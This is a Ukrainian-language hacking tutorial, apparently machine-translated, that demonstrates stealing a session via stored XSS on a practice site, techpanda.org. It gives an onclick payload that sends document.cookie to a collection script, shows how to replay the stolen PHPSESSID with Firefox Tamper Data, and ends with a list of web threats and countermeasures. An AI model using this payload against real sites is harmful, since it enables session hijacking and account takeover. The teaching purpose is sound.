Як зламати сайт? Поширені методи злому сайту

Методи злому веб-сайтів

Більше людей мають доступ до Інтернету, ніж будь-коли раніше. Це спонукало багато організацій до розробки веб-додатків, які користувачі можуть використовувати онлайн для взаємодії з організацією. Погано написаний код веб-додатків можна використати для отримання несанкціонованого доступу до конфіденційних даних і веб-серверів.

У цьому підручнику ви дізнаєтесь, як зламувати веб-сайти, і ми познайомимо вас із цим методи злому веб-додатків та заходи протидії ви можете встановити для захисту від таких атак.

Як зламати сайт

У цьому практичному сценарії злому веб-сайту ми збираємося викрасти сеанс користувача веб-додатку, розташованого за адресою www.techpanda.org. Ми будемо використовувати міжсайтовий сценарій, щоб зчитувати ідентифікатор сеансу cookie, а потім використовувати його для імітації законного сеансу користувача.

Робиться припущення, що зловмисник має доступ до веб-програми, і він хотів би захопити сеанси інших користувачів, які використовують ту саму програму. Метою цієї атаки може бути отримання адміністративного доступу до веб-програми, припускаючи, що обліковий запис зловмисника має обмежений доступ.

Крок 1) Відкрити URL http://www.techpanda.org/.

Для практичних цілей настійно рекомендується отримати доступ за допомогою SQL Injection. Зверніться до цього стаття щоб дізнатися більше про те, як це зробити.

Крок 2) Введіть дані для входу.

Електронна адреса для входу admin@google.com, пароль Password2010.

Крок 3) Перевірте приладову панель.

Якщо ви успішно ввійшли в систему, ви отримаєте наступну інформаційну панель

Зламати сайт

Крок 4) Введіть новий вміст.

Натисніть «Додати новий контакт» і введіть наступне ім’я

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Крок 5) додавати Javascript.

Наведений вище код використовує JavaScript. Він додає гіперпосилання з подією onclick. Коли нічого не підозрюючи користувач натискає посилання, подія отримує PHP ідентифікатор сеансу cookie та надсилає його до snatch_sess_id.php разом з ідентифікатором сеансу в URL-адресі

Зламати сайт

Крок 6) Додайте деталі.

Введіть решту даних, як показано нижче, і натисніть «Зберегти зміни».

Зламати сайт

Крок 7) Перевірте приладову панель.

Тепер ваша інформаційна панель виглядатиме так, як наведено нижче

Зламати сайт

Крок 8) Перевірте ідентифікатор сеансу.

  • Оскільки код міжсайтового сценарію зберігається в базі даних, він завантажуватиметься кожного разу, коли користувачі з правами доступу ввійдуть
  • Припустімо, адміністратор увійшов у систему та натиснув гіперпосилання з написом Dark
  • Він/вона отримає вікно з ідентифікатором сеансу, що відображається в URL-адресі
  • Зламати сайт

    Примітка:: сценарій може надсилати значення на якийсь віддалений сервер, де зберігається PHPSESSID, після чого користувач перенаправляється назад на веб-сайт, ніби нічого не сталося.

    Примітка:: отримане вами значення може відрізнятися від значення на цій веб-сторінці підручник з хакерства, але концепція та сама

    Використання імітації сеансу Firefox і додаток Tamper Data

    Блок-схема нижче показує кроки, які ви повинні виконати, щоб виконати цю вправу.

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Ви будете потребувати Firefox веб-браузер для цього розділу та надбудова Tamper Data
    • відкритий Firefox і встановіть додаток, як показано на схемах нижче

    Використання імітації сеансу Firefox і додаток Tamper Data

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Знайдіть дані про втручання, а потім натисніть «Установити», як показано вище

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Натисніть Прийняти та встановити…

    Використання імітації сеансу Firefox і додаток Tamper Data

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Натисніть Перезапустити зараз, коли інсталяція завершиться
    • Увімкніть рядок меню Firefox якщо не показано

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Клацніть меню інструментів, а потім виберіть Дані зміни, як показано нижче

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Ви отримаєте таке вікно. Примітка. Якщо Windows не порожній, натисніть кнопку очищення

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Клацніть меню Start Tamper
    • Поверніться до Firefox веб-браузер, тип http://www.techpanda.org/dashboard.php потім натисніть клавішу enter, щоб завантажити сторінку
    • Ви отримаєте таке спливаюче вікно з Tamper Data

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Спливаюче вікно має три (3) варіанти. Параметр Tamper дозволяє змінювати інформацію заголовка HTTP перед її надсиланням на сервер.
    • Клацніть на нього
    • Ви отримаєте таке вікно

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Скопіюйте Ідентифікатор сесії PHP ви скопіювали з URL-адреси атаки та вставили його після знака рівності. Тепер ваше значення має виглядати так
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Натисніть кнопку OK
    • Ви знову отримаєте спливаюче вікно з даними про втручання

    Використання імітації сеансу Firefox і додаток Tamper Data

    • Зніміть прапорець із запитом Продовжити втручання?
    • Після завершення натисніть кнопку «Надіслати».
    • Ви повинні побачити інформаційну панель, як показано нижче

    Використання імітації сеансу Firefox і додаток Tamper Data

    Примітка:: ми не входили в систему, ми імітували сеанс входу, використовуючи значення PHPSESSID, яке ми отримали за допомогою міжсайтового сценарію

    Що таке веб-додаток? Що таке веб-загрози?

    Веб-додаток (він же веб-сайт) — це додаток, заснований на моделі клієнт-сервер. The сервер забезпечує доступ до бази даних і бізнес-логіку. Він розміщений на веб-сервері. Клієнтська програма працює у веб-браузері клієнта. Веб-програми зазвичай пишуться такими мовами, як Java, C# та VB.Net, PHP, ColdFusion Markup Language тощо. Механізми баз даних, що використовуються у веб-додатках, включають MySQL, MS SQL Server, PostgreSQL, SQLite, І т.д.

    Найкращі методи злому веб-сайтів

    Більшість веб-додатків розміщені на публічних серверах, доступних через Інтернет. Це робить їх уразливими для атак через легкий доступ. Нижче наведено поширені загрози веб-програм.

    • SQL-ін'єкція – метою цієї загрози може бути обхід алгоритмів входу, саботування даних тощо.
    • Відмова в обслуговуванні атак– метою цієї загрози може бути заборона законним користувачам доступу до ресурсу
    • Міжсайтовий сценарій XSS– метою цієї загрози може бути впровадження коду, який можна виконати в браузері на стороні клієнта.
    • Отруєння файлами cookie/сеансом– метою цієї загрози є зміна файлів cookie/даних сеансу зловмисником для отримання несанкціонованого доступу.
    • Фальсифікація форми – мета цієї загрози – змінити дані форми, такі як ціни в програмах електронної комерції, щоб зловмисник міг отримати товари за зниженими цінами.
    • Введення коду – метою цієї загрози є впровадження такого коду, як PHP, Pythonтощо, які можна виконати на сервері. Код може встановлювати бекдори, розкривати конфіденційну інформацію тощо.
    • Псування– метою цієї загрози є зміна сторінки, яка відображається на веб-сайті, і перенаправлення всіх запитів сторінки на одну сторінку, яка містить повідомлення зловмисника.

    Як захистити свій сайт від злому?

    Організація може прийняти наступну політику, щоб захистити себе від атак на веб-сервер.

    • SQL-ін'єкція – дезінфекція та перевірка параметрів користувача перед надсиланням їх до бази даних для обробки може допомогти зменшити ймовірність атаки через SQL-ін'єкція. Двигуни баз даних, такі як MS SQL Server, MySQL, тощо параметри підтримки та підготовлені звіти. Вони набагато безпечніші за традиційні оператори SQL
    • Атаки на відмову в обслуговуванні – брандмауери можуть бути використані для скидання трафіку з підозрілої IP-адреси, якщо атака є простим DoS. Правильна конфігурація мереж і системи виявлення вторгнень також може допомогти зменшити ймовірність a DoS-атака був успішним.
    • Міжсайтовий сценарій – перевірка та очищення заголовків, параметрів, що передаються через URL-адресу, параметрів форми та прихованих значень можуть допомогти зменшити XSS-атаки.
    • Отруєння файлами cookie/сеансом – цьому можна запобігти шляхом шифрування вмісту файлів cookie, тайм-ауту файлів cookie через деякий час, асоціювання файлів cookie з IP-адресою клієнта, який використовувався для їх створення.
    • Гартування форми – цьому можна запобігти шляхом перевірки та перевірки введених користувачем даних перед їх обробкою.
    • Введення коду – цьому можна запобігти, розглядаючи всі параметри як дані, а не виконуваний код. Для цього можна використовувати санітарну обробку та перевірку.
    • Псування – хороша політика безпеки розробки веб-додатків має гарантувати, що вона закриває часто використовувані уразливості для доступу до веб-сервера. Це може бути правильна конфігурація операційної системи, програмного забезпечення веб-сервера та найкращі методи безпеки під час розробки веб-додатків.
    Перевір це: 9 найкращих сканерів URL-адрес для перевірки, чи посилання захищено від зловмисного програмного забезпечення

    Підсумки

    • Веб-додаток базується на моделі сервер-клієнт. Клієнтська сторона використовує веб-браузер для доступу до ресурсів на сервері.
    • Веб-додатки зазвичай доступні через Інтернет. Це робить їх вразливими до атак.
    • Загрози для веб-додатків включають впровадження SQL, впровадження коду, XSS, пошкодження, отруєння файлами cookie тощо.
    • Хороша політика безпеки під час розробки веб-програм може допомогти зробити їх безпечними.